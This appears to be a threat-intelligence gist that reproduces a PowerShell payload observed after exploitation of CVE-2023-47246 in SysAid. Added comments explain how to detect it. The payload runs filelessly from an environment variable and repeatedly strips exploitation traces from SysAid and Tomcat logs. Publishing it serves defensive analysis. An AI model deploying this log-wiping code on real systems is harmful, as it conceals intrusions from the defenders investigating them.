@JohnHammond
Created November 10, 2023 00:52
Observed secondary PowerShell payload following CVE-2023-47246 exploitation
# Stage 1 of the observed payload: the whole second-stage script is stored as a
# single-quoted here-string (no variable expansion) in the environment variable
# SehCore instead of being written to disk; it is only run by the Invoke-Expression
# that follows the assignment. NOTE(review): as transcribed, the delimiters look
# reversed relative to PowerShell here-string syntax (`@'` opens, `'@` closes) —
# presumably a transcription artifact of the capture rather than the original form.
#
# Defender notes on the embedded script (left byte-identical below):
#  - cleanLL walks every file in the SysAid log4j directory and the Tomcat logs
#    directory, drops each line matching $log4jPattern / $tcPattern (userentry,
#    getLogo.jsp, "Got LDAP file", ldapSyms, usersfile, time=11891398229), writes
#    the filtered copy to "<logfile>.bck" and copies it back over the original.
#    The .bck file is never deleted, so "*.bck" files in those two directories are
#    a forensic artifact of this cleanup, and the removed lines are the log evidence
#    an investigator should expect to be missing.
#  - After an initial clean, the loop polls every 5 s and cleans the logs again on
#    each pass; it exits once "webapps\usersfiles.war" is gone (waiting first for
#    the exploded "webapps\usersfiles" directory to disappear) or once a marker file
#    "webapps\usersfiles\leave" appears, which it removes before a final clean.
$env:SehCore = '@
$tomcat_dir = "C:\Program Files\SysAidServer\tomcat";
$log4j_dir = "C:\Program Files\SysAidServer\root\WEB-INF\logs";
$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=11891398229";
$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=11891398229";
function cleanLL {
$fl = Get-ChildItem "$log4j_dir";
for ($i=0; $i -lt $fl.Count; $i++) {
$logFile = $fl[$i].FullName;
if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {
Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";
cp "$logFile.bck" "$logFile"
}
}
$fl = Get-ChildItem "$tomcat_dir\logs\";
for ($i=0; $i -lt $fl.Count; $i++) {
$logFile = $fl[$i].FullName;
if (Select-String -Pattern "$tcPattern" -Path "$logFile") {
Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";
cp "$logFile.bck" "$logFile"
}
}
}
sleep 5;
cleanLL;
while(1) {
sleep 5;
if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {
while((Test-Path "$tomcat_dir\webapps\usersfiles")) {
sleep 1;
}
cleanLL;
break;
}
if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {
Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";
sleep 5;
cleanLL;
break;
}
else {
cleanLL;
}
}
@'
# Stage 2: copy the stored script out of the environment, blank the variable so the
# script body no longer sits in the process environment, and execute it in-process
# with Invoke-Expression — no script file is written to disk. Detection note: with
# PowerShell script block logging enabled (event ID 4104), the content passed to
# Invoke-Expression is what gets recorded, so the log-cleaning script above is
# visible there even though it never touches the filesystem. "CLN_ST" is only
# printed after the embedded loop breaks out — presumably a completion marker for
# whatever launched this; the leading ';' on that line appears to be a stray empty
# statement rather than anything functional.
$s=$env:SehCore;
$env:SehCore="";
Invoke-Expression $s;
;echo CLN_ST;
exit 0;